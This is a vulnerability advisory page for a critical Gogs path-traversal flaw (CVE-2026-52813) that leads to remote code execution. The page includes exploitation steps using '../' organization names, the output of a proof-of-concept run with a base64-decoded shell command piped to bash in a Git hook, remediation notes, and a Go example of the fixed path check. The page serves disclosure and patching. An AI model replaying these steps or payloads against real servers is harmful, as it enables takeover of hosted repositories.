
Gogs EUVD-2026-39084

CVE-2026-52813 CRITICAL
Relative Path Traversal (CWE-23)
2026-06-23 https://github.com/gogs/gogs GHSA-c39w-43gm-34h5
10.0
CVSS 3.1 · Vendor: https://github.com/gogs/gogs

Severity by source

Vendor (https://github.com/gogs/gogs) PRIMARY
10.0 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Network API, low complexity, scope-changing RCE as git user; PR:L because exploitation needs an account able to create an org (self-registration default but configurable).

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (https://github.com/gogs/gogs).

CVSS Vector (Vendor: https://github.com/gogs/gogs)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

Source Code Evidence Fetched
Jun 23, 2026 - 17:34 vuln.today
Analysis Generated
Jun 23, 2026 - 17:34 vuln.today
CVE Published
Jun 23, 2026 - 17:10 github-advisory
CRITICAL 10.0

Description (CVE.org)

Summary

Organization names containing path traversal sequences (../) are accepted by Gogs, and repositories under them are written to paths that follow these traversals. This allows storing and retrieving repository data at arbitrary locations on the filesystem. By creating a nested structure of Git repositories, one repository can overwrite another's hooks configuration, resulting in Remote Code Execution (RCE).

Details

During organization creation, internal/database/org.go calls os.MkdirAll(repox.UserPath(org.Name)) without sanitizing org.Name.

https://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/database/org.go#L165

Repository creation uses this name to decide where to write the Git bare repository (org/name.git). By setting the org name to ../../../../tmp/test and creating a repository under that organization, the repository gets written under /tmp/test on the server.

https://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/repox/repox.go#L57-L58

An attacker can abuse this by writing to the /data/gogs/data/tmp/local-r/1 directory, which is a local worktree of one of the Git repositories inside Gogs. These directories are editable through Git. By creating a repository nested inside that worktree, files like config and hooks/update of the nested bare repository are reachable through the path traversal and can be edited via Git. This allows the attacker to edit the hooks/update script with malicious Bash commands and then trigger the hook.

The steps to exploit this inside of Gogs are roughly (ignoring some syncing dummy actions):

  1. Create regular outer repository and get its ID
  2. Create organization named ../../../../data/gogs/data/tmp/local-r/{ID}/nested
  3. Create a repository inside this organization (eg. rce), which will be written into the local clone of the outer repository
  4. From the outer repository, edit nested/rce.git/hooks/update to contain malicious shell commands
  5. Interact with the rce repository again to trigger the updated hook, and RCE is achieved

PoC

  1. Set up a default Gogs instance by saving the following content to docker-compose.yml and running docker compose up:

```yml
services:
  db:
    image: postgres:16-alpine
    environment:
      POSTGRES_USER: gogs
      POSTGRES_PASSWORD: gogs
      POSTGRES_DB: gogs
    volumes:
      - postgres-data:/var/lib/postgresql/data
    restart: unless-stopped
    healthcheck:
      test: [ "CMD-SHELL", "pg_isready -U gogs -d gogs" ]
      interval: 5s
      timeout: 5s
      retries: 5

  gogs:
    image: gogs/gogs
    depends_on:
      db:
        condition: service_healthy
    ports:
      - "3000:3000"
    volumes:
      - gogs-data:/data
    restart: unless-stopped

volumes:
  gogs-data:
  postgres-data:
```

  2. Visit http://localhost:3000, set the *Host* to db:5432 and *Password* to gogs. Under *Admin Account Settings* configure your admin account
  3. As the attacker, register an account with username attacker and password attacker at http://localhost:3000/user/sign_up
  4. As the attacker, run the following script (in a gist to avoid cluttering this advisory):

https://gist.github.com/JorianWoltjer/4b72063338b27140f4439c524d98f2b9

The output should look like:

```shell
$ python3 gogs-rce.py
step 1 token ok
step 2 create personal repo 201 full_name attacker/writer-bd426045
step 3 web editor new file on attacker / writer-bd426045
step 4 GET writer repo -> local-r 1
step 5 create org 201 local-r 1 username ../../../../data/gogs/data/tmp/local-r/1/nested
step 6 get org 200 username ../../../../data/gogs/data/tmp/local-r/1/nested
step 7 create repo 201 full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 html_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 clone_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7.git
step 8 get repo 200 owner.username ../../../../data/gogs/data/tmp/local-r/1/nested full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 empty False
Cloning into '/tmp/poc-writer-fy4k5064'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Unpacking objects: 100% (6/6), 491 bytes | 491.00 KiB/s, done.
step 9 clone writer repo -> /tmp/poc-writer-fy4k5064
[master 3cf84b2] poc: nested/rce-b175aca7.git hook path
 1 file changed, 1 insertion(+)
 create mode 100755 nested/rce-b175aca7.git/hooks/update
step 10 write nested/rce-b175aca7.git/hooks/update with echo 'aWQ=' | base64 -d | bash > pwned
Enumerating objects: 7, done.
Counting objects: 100% (7/7), done.
Delta compression using up to 14 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (6/6), 1022 bytes | 1022.00 KiB/s, done.
Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
To http://localhost:3000/attacker/writer-bd426045.git
   b0b9886..3cf84b2  master -> master
step 11 push writer
step 12 API new file on attacker / writer-bd426045
step 13 API new file on org ../../../../data/gogs/data/tmp/local-r/1/nested / rce-b175aca7
step 14 API new file on attacker / writer-bd426045
step 15 GET raw pwned 200 http://localhost:3000/attacker/writer-bd426045/raw/master/nested/rce-b175aca7.git/pwned

=== COMMAND OUTPUT ===
uid=1000(git) gid=1000(git) groups=1000(git)
```

Impact

In the default setting, users can self-register and then create their own organizations. From here they can perform this exploit to achieve RCE as the git user.

Analysis (AI)

Remote code execution in Gogs self-hosted Git service before 0.14.3 allows unauthenticated attackers (where self-registration is enabled) to abuse unsanitized organization names containing '../' sequences to write Git repository files outside the intended storage root, then overwrite a repository's hooks/update script and trigger arbitrary command execution as the git user. The flaw carries a CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C) rating, and a fully working public proof-of-concept is published alongside the GHSA advisory, though no CISA KEV listing or EPSS data is provided in the input.


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Self-register account on exposed Gogs
Delivery: Create outer personal repository and note its ID
Exploit: Create organization with '../../../../data/gogs/data/tmp/local-r/{ID}/nested' name
Install: Create nested repo writing into outer repo's local worktree
C2: Push commit overwriting nested .git/hooks/update with shell payload
Execute: Trigger Git operation invoking the hook
Impact: Command execution as git user

Vulnerability Assessment (AI)

Exploitation: Requires (1) network reachability to the Gogs HTTP API, (2) an account that can create an organization and a repository (by default Gogs allows self-registration, so this is effectively unauthenticated, but if an administrator has set DISABLE_REGISTRATION=true or restricted org creation, the attacker needs a low-privileged account with org-create rights), and (3) a Gogs version earlier than 0.14.3. …
Risk Assessment: All available signals point to a top-priority issue. …
Exploit Scenario: Using the published PoC (gist linked from GHSA-c39w-43gm-34h5), an attacker self-registers on an internet-exposed Gogs instance, creates a normal personal repository, then creates an organization whose name is a path-traversal string pointing at that repository's server-side local worktree (data/gogs/data/tmp/local-r/<id>/nested) and creates a nested repo inside it. From the outer repo they commit a malicious nested/<repo>.git/hooks/update script and trigger a subsequent server-side Git operation, executing arbitrary commands as the git user with access to all hosted repositories.
Remediation: Vendor-released patch: upgrade to Gogs 0.14.3 or later, which adds pathx.Clean() sanitization to repox.UserPath/RepoPath and enforces AlphaDashDot/MaxSize(35) validation on organization usernames in the API (see commit f6acd467305943aae8403cbac81f0118dd1235d7 and PR https://github.com/gogs/gogs/pull/8334, release notes at https://github.com/gogs/gogs/releases/tag/v0.14.3, advisory https://github.com/gogs/gogs/security/advisories/GHSA-c39w-43gm-34h5). …
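The following Go program is an added example, not Gogs' own code: it places the pre-0.14.3 owner-path construction described under Details next to a hardened variant in the spirit of the 0.14.3 fix (name validation plus a containment check). The repository root, the regex approximating AlphaDashDot, and all function names are assumptions made for this example; the traversal string is the one from the advisory.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Assumed repository root (the official Docker image layout); not taken from the advisory.
const repoRoot = "/data/git/gogs-repositories"

// alphaDashDot approximates Gogs' AlphaDashDot rule: letters, digits, '-', '_' and '.'.
// It still admits "." and "..", so on its own it is not enough; see safeOwnerPath.
var alphaDashDot = regexp.MustCompile(`^[A-Za-z0-9_.-]+$`)

const maxOrgNameLen = 35 // the MaxSize(35) limit named in the remediation

var (
	ErrBadOrgName  = errors.New("organization name fails AlphaDashDot/MaxSize validation")
	ErrEscapesRoot = errors.New("owner path resolves outside the repository root")
)

// vulnerableOwnerPath mirrors the pre-0.14.3 behaviour: the owner name is joined
// onto the root as-is, so "../" segments walk out of the root.
func vulnerableOwnerPath(root, owner string) string {
	return filepath.Join(root, owner)
}

// safeOwnerPath is the hardened variant written for this example: validate the
// name, then verify that the resolved path is a strict child of root.
func safeOwnerPath(root, owner string) (string, error) {
	if len(owner) > maxOrgNameLen || !alphaDashDot.MatchString(owner) {
		return "", ErrBadOrgName
	}
	p := filepath.Join(root, owner) // Join normalizes "..", but does not confine to root
	rel, err := filepath.Rel(root, p)
	if err != nil || rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrEscapesRoot
	}
	return p, nil
}

func main() {
	evil := "../../../../data/gogs/data/tmp/local-r/1/nested" // org name from the advisory
	fmt.Println("vulnerable:", vulnerableOwnerPath(repoRoot, evil))
	for _, n := range []string{evil, "..", "my-org"} {
		p, err := safeOwnerPath(repoRoot, n)
		fmt.Printf("hardened %q -> %q, %v\n", n, p, err)
	}
}
```

The vulnerable join resolves the advisory's org name to /data/gogs/data/tmp/local-r/1/nested, i.e. into the outer repository's local worktree; the hardened version rejects it at validation and, separately, rejects "." and ".." through the containment check.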

Recommended Action (AI)

Within 24 hours: Disable self-registration in Gogs settings as an interim measure while patching is completed. …


